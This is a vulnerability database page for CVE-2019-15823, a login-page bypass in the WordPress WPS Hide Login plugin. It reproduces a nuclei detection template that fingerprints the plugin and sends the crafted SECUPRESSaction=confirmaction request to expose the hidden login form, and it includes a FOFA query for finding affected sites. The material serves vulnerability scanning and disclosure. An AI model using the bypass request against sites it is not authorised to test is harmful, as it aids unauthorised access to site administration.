Lucene search
K

WPS Hide Login <= 1.5.2.2 - Login Page Bypass

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

CVE-2019-15823: WPS Hide Login up to 1.5.2.2 bypasses login protection with crafted requests.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2019-15823
7 Jan 202610:48
circl
CNVD
WordPress wps-hide-login plugin security bypass vulnerability (CNVD-2019-30733)
3 Sep 201900:00
cnvd
CVE
CVE-2019-15823
30 Aug 201912:49
cve
Cvelist
CVE-2019-15823
30 Aug 201912:49
cvelist
EUVD
EUVD-2019-6740
7 Oct 202500:30
euvd
NVD
CVE-2019-15823
30 Aug 201913:15
nvd
OpenVAS
WordPress WPS Hide Login Plugin < 1.5.3 Multiple Vulnerabilities
4 Sep 201900:00
openvas
OSV
CVE-2019-15823
30 Aug 201913:15
osv
Prion
Design/Logic Flaw
30 Aug 201913:15
prion
RedhatCVE
CVE-2019-15823
22 May 202504:35
redhatcve
Rows per page
id: CVE-2019-15823

info:
  name: WPS Hide Login <= 1.5.2.2  - Login Page Bypass
  author: pussycat0x
  severity: high
  description: |
    WPS-Hide-Login plugin before 1.5.3 for WordPress contains an action=confirmaction protection bypass, letting attackers bypass security checks, exploit requires sending crafted requests.
  impact: |
    Attackers can bypass login protection, potentially leading to unauthorized access.
  remediation: |
    Update to version 1.5.3 or later.
  reference:
    - https://web.archive.org/web/20230601185557/https://secupress.me/blog/wps-hide-login-v1-5-2-2-multiples-vulnerabilities/
    - https://web.archive.org/web/20230711062924/https://wpscan.com/vulnerability/9469/
  metadata:
    max-request: 2
    verified: true
    fofa-query: body="/wp-content/plugins/wps-hide-login"
    vendor: wpserveur
    product: wps-hide-login
  tags: cve,cve2019,wordpress,wp-plugin,wp,disclosure,wps-hide-login,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    matchers:
      - type: word
        part: response
        words:
          - "wps-hide"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-login.php?SECUPRESSaction=confirmaction"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Username or Email Address</label>')"
          - "contains(body, 'wp-login-lost-password')"
        condition: and
# digest: 4a0a00473045022033aa8639fd9469a32da2ea8b728901eedb80aa49c641c417cf96d67cde737935022100f4d530c2b89ce82d52b09f24863a826c6ac4bbc8916cf2f7001e199306276607:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 27.5
CVSS 39.8
EPSS0.08584
7